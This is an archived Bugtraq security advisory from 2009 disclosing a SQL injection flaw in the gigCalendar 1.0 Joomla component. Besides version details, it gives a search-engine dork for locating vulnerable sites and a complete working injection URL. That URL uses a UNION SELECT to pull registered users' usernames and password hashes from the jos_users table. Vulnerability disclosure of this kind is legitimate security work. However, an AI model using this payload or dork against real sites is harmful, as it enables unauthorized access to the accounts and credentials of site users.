gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, submit@xxxxxxxxxxx
Subject: gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Sat, 21 Feb 2009 19:14:49 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=kBgc2+EUgTstoxwRc82AxFSFLZfIMr9mLDFleewIDcs=; b=DK/jGCPs6X7jJ8S1v6olKI4FkGPwKgoi9DRhQEBxUNkU8+bUZKMxVEwt72ZRy8eIUw 9ch015KHqxGFAvgl0cJP/3q191qsAaymOQzGSLCqSyj39SULfiUyN1HAakFSRLPBtRjK oI1xWEYp1Cazm4J1MgDPvSOwEN4NPCAo5bn74=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=nnIajdt89amA55OcJ1WopVqv//gEBMvmsPb6fCaUJ+V7k2E/2XG+nsG/EtVZa5geOH Xd0cKa1EuPDfOdFTNPguZUzzE7kGoaSIu436m4aVlrHaoXqmC/c8I2pc2gSuE9GdulwJ 8laYGbbmOJDuKyW+Ybeu8W6vuHmFMK2TdMdwY=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******   Salvatore "drosophila" Fresta   *******


Application:    gigCalendar Joomla Component 1.0
                                http://joomlacode.org/gf/project/gigcalendar/
Version:                gigCalendar 1.0
Bug:            * SQL Injection
Exploitation:   Remote
Dork:                   inurl:"index.php?option=com_gigcal"
Date:           21 Feb 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                        e-mail: drosophilaxxx@xxxxxxxxx
                

*************************************************

- BUGS

SQL Injection:

        Requisites: magic_quotes_gpc = off

        File affected: banddetails.php

        This bug allows a guest to view username and
        password of a registered user.

        
http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
FROM jos_users%23

*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

Prev by Date: gigCalendar Joomla Component 1.0 SQL Injection
Next by Date: XSS Attack using SMS to Optus/Huawei E960 HSDPA Router
Previous by thread: gigCalendar Joomla Component 1.0 SQL Injection
Next by thread: XSS Attack using SMS to Optus/Huawei E960 HSDPA Router
Index(es):
- Date
- Thread